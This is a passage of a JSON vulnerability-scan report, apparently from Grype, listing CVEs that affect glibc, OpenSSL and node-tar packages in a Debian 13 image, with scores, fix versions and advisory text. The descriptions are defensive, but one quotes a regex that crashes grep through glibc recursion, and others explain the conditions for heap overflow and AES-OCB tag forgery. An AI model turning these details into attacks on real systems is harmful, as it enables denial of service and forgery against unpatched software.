grep.","cvss":[],"epss":[{"cve":"CVE-2018-20796","epss":0.05804,"percentile":0.92139,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2018-20796","cwe":"CWE-674","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":[],"state":"not-fixed"},"advisories":[],"risk":0.2902},"relatedVulnerabilities":[{"id":"CVE-2018-20796","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2018-20796","namespace":"nvd:cpe","severity":"High","urls":["http://www.securityfocus.com/bid/107160","https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141","https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html","https://security.netapp.com/advisory/ntap-20190315-0002/","https://support.f5.com/csp/article/K26346590?utm_source=f5support&%3Butm_medium=RSS"],"description":"In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.0","vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:L/Au:N/C:N/I:N/A:P","metrics":{"baseScore":5,"exploitabilityScore":10,"impactScore":2.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2018-20796","epss":0.05804,"percentile":0.92139,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2018-20796","cwe":"CWE-674","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"glibc","version":"2.41-12+deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2018-20796","versionConstraint":"none (unknown)"}}],"artifact":{"id":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&package-id=089516409246f602&upstream=glibc","name":"libc6","version":"2.41-12+deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libc6/copyright","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6.md5sums","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""}],"language":"","licenses":["BSD-2-Clause","BSD-3-clause-Berkeley","BSD-3-clause-Carnegie","BSD-3-clause-Oracle","BSD-3-clause-WIDE","BSD-like-Spencer","BSL-1.0","CORE-MATH","Carnegie","DEC","FSFAP","GPL-2+-with-link-exception","GPL-2.0-only","GPL-2.0-or-later","GPL-3.0-only","GPL-3.0-or-later","IBM","ISC","Inner-Net","LGPL-2.0-only","LGPL-2.0-or-later","LGPL-2.1+-with-link-exception","LGPL-2.1-only","LGPL-2.1-or-later","LGPL-3.0-only","LGPL-3.0-or-later","MIT-like-Lord","PCRE","SunPro","Unicode-DFS-2016","Univ-Coimbra","public-domain"],"cpes":["cpe:2.3:a:libc6:libc6:2.41-12\\+deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&upstream=glibc","upstreams":[{"name":"glibc"}]}},{"vulnerability":{"id":"CVE-2026-4046","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-4046","namespace":"debian:distro:debian:13","severity":"High","urls":[],"description":"The iconv() function in the GNU C Library versions 2.43 and earlier may crash due to an assertion failure when converting inputs from the IBM1390 or IBM1399 character sets, which may be used to remotely crash an application. This vulnerability can be trivially mitigated by removing the IBM1390 and IBM1399 character sets from systems that do not need them.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-4046","epss":0.00357,"percentile":0.27422,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-4046","cwe":"CWE-617","source":"3ff69d7a-14f2-4f67-a097-88dee7810d18","type":"Secondary"}],"fix":{"versions":["2.41-12+deb13u3"],"state":"fixed","available":[{"version":"2.41-12+deb13u3","date":"2026-05-17","kind":"first-observed"}]},"advisories":[],"risk":0.26775},"relatedVulnerabilities":[{"id":"CVE-2026-4046","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-4046","namespace":"nvd:cpe","severity":"High","urls":["https://inbox.sourceware.org/libc-announce/76814edf-cf7f-47ec-979d-2dce0a2c76bf@gotplt.org/T/#u","https://sourceware.org/bugzilla/show_bug.cgi?id=33980","https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0007;hb=HEAD"],"description":"The iconv() function in the GNU C Library versions 2.43 and earlier may crash due to an assertion failure when converting inputs from the IBM1390 or IBM1399 character sets, which may be used to remotely crash an application.\n\n\n\nThis vulnerability can be trivially mitigated by removing the IBM1390 and IBM1399 character sets from systems that do not need them.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-4046","epss":0.00357,"percentile":0.27422,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-4046","cwe":"CWE-617","source":"3ff69d7a-14f2-4f67-a097-88dee7810d18","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"glibc","version":"2.41-12+deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-4046","versionConstraint":"< 2.41-12+deb13u3 (deb)"},"fix":{"suggestedVersion":"2.41-12+deb13u3"}}],"artifact":{"id":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&package-id=089516409246f602&upstream=glibc","name":"libc6","version":"2.41-12+deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libc6/copyright","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6.md5sums","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""}],"language":"","licenses":["BSD-2-Clause","BSD-3-clause-Berkeley","BSD-3-clause-Carnegie","BSD-3-clause-Oracle","BSD-3-clause-WIDE","BSD-like-Spencer","BSL-1.0","CORE-MATH","Carnegie","DEC","FSFAP","GPL-2+-with-link-exception","GPL-2.0-only","GPL-2.0-or-later","GPL-3.0-only","GPL-3.0-or-later","IBM","ISC","Inner-Net","LGPL-2.0-only","LGPL-2.0-or-later","LGPL-2.1+-with-link-exception","LGPL-2.1-only","LGPL-2.1-or-later","LGPL-3.0-only","LGPL-3.0-or-later","MIT-like-Lord","PCRE","SunPro","Unicode-DFS-2016","Univ-Coimbra","public-domain"],"cpes":["cpe:2.3:a:libc6:libc6:2.41-12\\+deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&upstream=glibc","upstreams":[{"name":"glibc"}]}},{"vulnerability":{"id":"CVE-2026-5928","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-5928","namespace":"debian:distro:debian:13","severity":"High","urls":[],"description":"Calling the ungetwc function on a FILE stream with wide characters encoded in a character set that has overlaps between its single byte and multi-byte character encodings, in the GNU C Library version 2.43 or earlier, may result in an attempt to read bytes before an allocated buffer, potentially resulting in unintentional disclosure of neighboring data in the heap, or a program crash. A bug in the wide character pushback implementation (_IO_wdefault_pbackfail in libio/wgenops.c) causes ungetwc() to operate on the regular character buffer (fp->_IO_read_ptr) instead of the actual wide-stream read pointer (fp->_wide_data->_IO_read_ptr). The program crash may happen in cases where fp->_IO_read_ptr is not initialized and hence points to NULL. The buffer under-read requires a special situation where the input character encoding is such that there are overlaps between single byte representations and multibyte representations in that encoding, resulting in spurious matches. The spurious match case is not possible in the standard Unicode character sets.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-5928","epss":0.00345,"percentile":0.26171,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-5928","cwe":"CWE-127","source":"3ff69d7a-14f2-4f67-a097-88dee7810d18","type":"Secondary"}],"fix":{"versions":[],"state":"wont-fix"},"advisories":[],"risk":0.25875},"relatedVulnerabilities":[{"id":"CVE-2026-5928","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-5928","namespace":"nvd:cpe","severity":"High","urls":["https://sourceware.org/bugzilla/show_bug.cgi?id=33998"],"description":"Calling the ungetwc function on a FILE stream with wide characters encoded in a character set that has overlaps between its single byte and multi-byte character encodings, in the GNU C Library version 2.43 or earlier, may result in an attempt to read bytes before an allocated buffer, potentially resulting in unintentional disclosure of neighboring data in the heap, or a program crash.\n\nA bug in the wide character pushback implementation (_IO_wdefault_pbackfail in libio/wgenops.c) causes ungetwc() to operate on the regular character buffer (fp->_IO_read_ptr) instead of the actual wide-stream read pointer (fp->_wide_data->_IO_read_ptr). The program crash may happen in cases where fp->_IO_read_ptr is not initialized and hence points to NULL. The buffer under-read requires a special situation where the input character encoding is such that there are overlaps between single byte representations and multibyte representations in that encoding, resulting in spurious matches. The spurious match case is not possible in the standard Unicode character sets.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-5928","epss":0.00345,"percentile":0.26171,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-5928","cwe":"CWE-127","source":"3ff69d7a-14f2-4f67-a097-88dee7810d18","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"glibc","version":"2.41-12+deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-5928","versionConstraint":"none (unknown)"}}],"artifact":{"id":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&package-id=089516409246f602&upstream=glibc","name":"libc6","version":"2.41-12+deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libc6/copyright","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6.md5sums","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""}],"language":"","licenses":["BSD-2-Clause","BSD-3-clause-Berkeley","BSD-3-clause-Carnegie","BSD-3-clause-Oracle","BSD-3-clause-WIDE","BSD-like-Spencer","BSL-1.0","CORE-MATH","Carnegie","DEC","FSFAP","GPL-2+-with-link-exception","GPL-2.0-only","GPL-2.0-or-later","GPL-3.0-only","GPL-3.0-or-later","IBM","ISC","Inner-Net","LGPL-2.0-only","LGPL-2.0-or-later","LGPL-2.1+-with-link-exception","LGPL-2.1-only","LGPL-2.1-or-later","LGPL-3.0-only","LGPL-3.0-or-later","MIT-like-Lord","PCRE","SunPro","Unicode-DFS-2016","Univ-Coimbra","public-domain"],"cpes":["cpe:2.3:a:libc6:libc6:2.41-12\\+deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&upstream=glibc","upstreams":[{"name":"glibc"}]}},{"vulnerability":{"id":"CVE-2026-7383","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-7383","namespace":"debian:distro:debian:13","severity":"High","urls":[],"description":"Issue summary: A signed integer overflow when sizing the destination buffer for Unicode output in ASN1_mbstring_ncopy() can lead to a heap buffer overflow. Impact summary: A heap buffer overflow may lead to a crash or possibly attacker controlled code execution or other undefined behaviour. In ASN1_mbstring_copy() and ASN1_mbstring_ncopy() the destination size for Unicode output is computed in a signed int: by left shift of the input character count for BMPSTRING (UTF-16) and UNIVERSALSTRING (UTF-32), and by summing per-character byte counts for UTF8STRING. The calculation overflows when the input reaches around 2^30 characters. In the worst case (UNIVERSALSTRING at 2^30 characters) the size wraps to zero, OPENSSL_malloc(1) is called, and the subsequent character copy writes several gigabytes past the one-byte allocation. X.509 certificate processing routes through ASN1_STRING_set_by_NID(), whose DIRSTRING_TYPE mask excludes UNIVERSALSTRING and whose per-NID size limits cap the input length; no network protocol or certificate-handling path in OpenSSL exercises the overflow. Triggering the bug requires an application that calls ASN1_mbstring_copy() or ASN1_mbstring_ncopy() directly, or registers a custom string type via ASN1_STRING_TABLE_add(), with attacker-controlled input on the order of half a gigabyte or more. For these reasons this issue was assigned Low severity. The FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","metrics":{"baseScore":8.1,"exploitabilityScore":2.3,"impactScore":5.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-7383","epss":0.00324,"percentile":0.23964,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-7383","cwe":"CWE-787","source":"openssl-security@openssl.org","type":"Secondary"}],"fix":{"versions":["3.5.6-1~deb13u2"],"state":"fixed","available":[{"version":"3.5.6-1~deb13u2","date":"2026-06-09","kind":"advisory"}]},"advisories":[{"id":"DSA-6335-1","link":"https://security-tracker.debian.org/tracker/DSA-6335-1"}],"risk":0.25272},"relatedVulnerabilities":[{"id":"CVE-2026-7383","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-7383","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/openssl/openssl/commit/4f8d2bddaa2c8e06f9c33390ee1717059a6e4be6","https://github.com/openssl/openssl/commit/80c15faaf78042bbb8654a0e234c50c381732f74","https://github.com/openssl/openssl/commit/bd17511070fb39a67bfa19682affb765e706a974","https://github.com/openssl/openssl/commit/c332adaced43bcbb85f97410597e951c11ec3083","https://github.com/openssl/openssl/commit/d32350ae8ef7426718f5aa9e383d4b51398ee255","https://openssl-library.org/news/secadv/20260609.txt"],"description":"Issue summary: A signed integer overflow when sizing the destination\nbuffer for Unicode output in ASN1_mbstring_ncopy() can lead to a heap\nbuffer overflow.\n\nImpact summary: A heap buffer overflow may lead to a crash or possibly\nattacker controlled code execution or other undefined behaviour.\n\nIn ASN1_mbstring_copy() and ASN1_mbstring_ncopy() the destination\nsize for Unicode output is computed in a signed int: by left shift\nof the input character count for BMPSTRING (UTF-16) and\nUNIVERSALSTRING (UTF-32), and by summing per-character byte counts\nfor UTF8STRING. The calculation overflows when the input reaches\naround 2^30 characters. In the worst case (UNIVERSALSTRING at 2^30\ncharacters) the size wraps to zero, OPENSSL_malloc(1) is called, and\nthe subsequent character copy writes several gigabytes past the\none-byte allocation.\n\nX.509 certificate processing routes through ASN1_STRING_set_by_NID(),\nwhose DIRSTRING_TYPE mask excludes UNIVERSALSTRING and whose per-NID\nsize limits cap the input length; no network protocol or\ncertificate-handling path in OpenSSL exercises the overflow.\nTriggering the bug requires an application that calls\nASN1_mbstring_copy() or ASN1_mbstring_ncopy() directly, or registers\na custom string type via ASN1_STRING_TABLE_add(), with\nattacker-controlled input on the order of half a gigabyte or more.\nFor these reasons this issue was assigned Low severity.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by\nthis issue, as the affected code is outside the OpenSSL FIPS module\nboundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","metrics":{"baseScore":8.1,"exploitabilityScore":2.3,"impactScore":5.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-7383","epss":0.00324,"percentile":0.23964,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-7383","cwe":"CWE-787","source":"openssl-security@openssl.org","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"openssl","version":"3.5.5-1~deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-7383","versionConstraint":"< 3.5.6-1~deb13u2 (deb)"},"fix":{"suggestedVersion":"3.5.6-1~deb13u2"}}],"artifact":{"id":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&package-id=d839547e5a6a801d&upstream=openssl","name":"libssl3t64","version":"3.5.5-1~deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libssl3t64/copyright","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64.md5sums","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""}],"language":"","licenses":["Apache-2.0","Artistic","GPL-1.0-only","GPL-1.0-or-later"],"cpes":["cpe:2.3:a:libssl3t64:libssl3t64:3.5.5-1\\~deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&upstream=openssl","upstreams":[{"name":"openssl"}]}},{"vulnerability":{"id":"CVE-2026-45445","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-45445","namespace":"debian:distro:debian:13","severity":"High","urls":[],"description":"Issue summary: When an application drives an AES-OCB context through the public EVP_Cipher() one-shot interface, the application-supplied initialisation vector (IV) is silently discarded. Impact summary: Every message encrypted under the same key uses the same effective nonce regardless of the IV supplied by the caller, resulting in (key, nonce) reuse and loss of confidentiality. If the same code path is used to compute the authentication tag, the tag depends only on the (key, IV) pair and not on the plaintext or ciphertext, allowing universal forgery of arbitrary ciphertext from a single captured message. OpenSSL provides two ways to drive a cipher: the documented streaming interface (EVP_CipherUpdate / EVP_CipherFinal_ex) and a lower-level one-shot, EVP_Cipher(), whose documentation explicitly recommends against use by applications in favour of EVP_CipherUpdate() and EVP_CipherFinal_ex(). The OCB provider's streaming handler flushes the application-supplied IV into the OCB context before processing data; the one-shot handler did not. Every call to EVP_Cipher() on an AES-OCB context therefore ran with the all-zero key-derived offset state left by cipher initialisation, regardless of the caller's IV. If EVP_EncryptFinal_ex() is subsequently used to obtain the authentication tag, the deferred IV setup runs at that point and clears the running checksum that should have been accumulated over the plaintext. The resulting tag is a function of (key, IV) only and verifies against any ciphertext produced under the same (key, IV) pair. The OpenSSL SSL/TLS implementation is not affected: AES-OCB is not a TLS cipher suite, and libssl does not call EVP_Cipher() in any case. Applications that drive AES-OCB through the documented streaming AEAD API (EVP_CipherUpdate / EVP_CipherFinal_ex) are not affected. Only applications that combine the AES-OCB cipher with the EVP_Cipher() one-shot API are vulnerable. The FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by this issue, as AES-OCB is outside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-45445","epss":0.00327,"percentile":0.24304,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-45445","cwe":"CWE-325","source":"openssl-security@openssl.org","type":"Secondary"}],"fix":{"versions":["3.5.6-1~deb13u2"],"state":"fixed","available":[{"version":"3.5.6-1~deb13u2","date":"2026-06-09","kind":"advisory"}]},"advisories":[{"id":"DSA-6335-1","link":"https://security-tracker.debian.org/tracker/DSA-6335-1"}],"risk":0.24524999999999997},"relatedVulnerabilities":[{"id":"CVE-2026-45445","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-45445","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/openssl/openssl/commit/323f0b6e7d530a4cb4336d50c88cb70f3ac2a451","https://github.com/openssl/openssl/commit/787a6dfba81b7b09c1e05ab31396c0cd7c36b3f7","https://github.com/openssl/openssl/commit/7ac4715234ee72d9f3c93426a2c08554b5b771af","https://github.com/openssl/openssl/commit/843c9b94ca9c2ed248bb30127bb4f3d7af0d607c","https://github.com/openssl/openssl/commit/983d54b5cce8d16147548ed1a37892d1720bbab6","https://openssl-library.org/news/secadv/20260609.txt"],"description":"Issue summary: When an application drives an AES-OCB context through the\npublic EVP_Cipher() one-shot interface, the application-supplied\ninitialisation vector (IV) is silently discarded.\n\nImpact summary: Every message encrypted under the same key uses the\nsame effective nonce regardless of the IV supplied by the caller,\nresulting in (key, nonce) reuse and loss of confidentiality. If the\nsame code path is used to compute the authentication tag, the tag\ndepends only on the (key, IV) pair and not on the plaintext or\nciphertext, allowing universal forgery of arbitrary ciphertext from a\nsingle captured message.\n\nOpenSSL provides two ways to drive a cipher: the documented streaming\ninterface (EVP_CipherUpdate / EVP_CipherFinal_ex) and a lower-level\none-shot, EVP_Cipher(), whose documentation explicitly recommends\nagainst use by applications in favour of EVP_CipherUpdate() and\nEVP_CipherFinal_ex(). The OCB provider's streaming handler flushes\nthe application-supplied IV into the OCB context before processing\ndata; the one-shot handler did not. Every call to EVP_Cipher() on an\nAES-OCB context therefore ran with the all-zero key-derived offset\nstate left by cipher initialisation, regardless of the caller's IV.\n\nIf EVP_EncryptFinal_ex() is subsequently used to obtain the\nauthentication tag, the deferred IV setup runs at that point and\nclears the running checksum that should have been accumulated over the\nplaintext. The resulting tag is a function of (key, IV) only and\nverifies against any ciphertext produced under the same (key, IV)\npair.\n\nThe OpenSSL SSL/TLS implementation is not affected: AES-OCB is not a\nTLS cipher suite, and libssl does not call EVP_Cipher() in any case.\nApplications that drive AES-OCB through the documented streaming AEAD\nAPI (EVP_CipherUpdate / EVP_CipherFinal_ex) are not affected. Only\napplications that combine the AES-OCB cipher with the EVP_Cipher()\none-shot API are vulnerable.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by\nthis issue, as AES-OCB is outside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-45445","epss":0.00327,"percentile":0.24304,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-45445","cwe":"CWE-325","source":"openssl-security@openssl.org","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"openssl","version":"3.5.5-1~deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-45445","versionConstraint":"< 3.5.6-1~deb13u2 (deb)"},"fix":{"suggestedVersion":"3.5.6-1~deb13u2"}}],"artifact":{"id":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&package-id=d839547e5a6a801d&upstream=openssl","name":"libssl3t64","version":"3.5.5-1~deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libssl3t64/copyright","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64.md5sums","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""}],"language":"","licenses":["Apache-2.0","Artistic","GPL-1.0-only","GPL-1.0-or-later"],"cpes":["cpe:2.3:a:libssl3t64:libssl3t64:3.5.5-1\\~deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&upstream=openssl","upstreams":[{"name":"openssl"}]}},{"vulnerability":{"id":"GHSA-8qq5-rm4j-mr97","dataSource":"https://github.com/advisories/GHSA-8qq5-rm4j-mr97","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97","https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e","https://nvd.nist.gov/vuln/detail/CVE-2026-23745"],"description":"node-tar is Vulnerable to Arbitrary File Overwrite and Symlink Poisoning via Insufficient Path Sanitization","cvss":[{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N","metrics":{"baseScore":8.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-23745","epss":0.00308,"percentile":0.22263,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-23745","cwe":"CWE-22","source":"security-advisories@github.com","type":"Primary"}],"fix":{"versions":["7.5.3"],"state":"fixed","available":[{"version":"7.5.3","date":"2026-01-17","kind":"first-observed"}]},"advisories":[],"risk":0.24177999999999994},"relatedVulnerabilities":[{"id":"CVE-2026-23745","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-23745","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e","https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97"],"description":"node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N","metrics":{"baseScore":6.1,"exploitabilityScore":1.9,"impactScore":4.3},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","metrics":{"baseScore":8.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-23745","epss":0.00308,"percentile":0.22263,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-23745","cwe":"CWE-22","source":"security-advisories@github.com","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"tar","version":"4.4.19"}},"found":{"vulnerabilityID":"GHSA-8qq5-rm4j-mr97","versionConstraint":"<=7.5.2 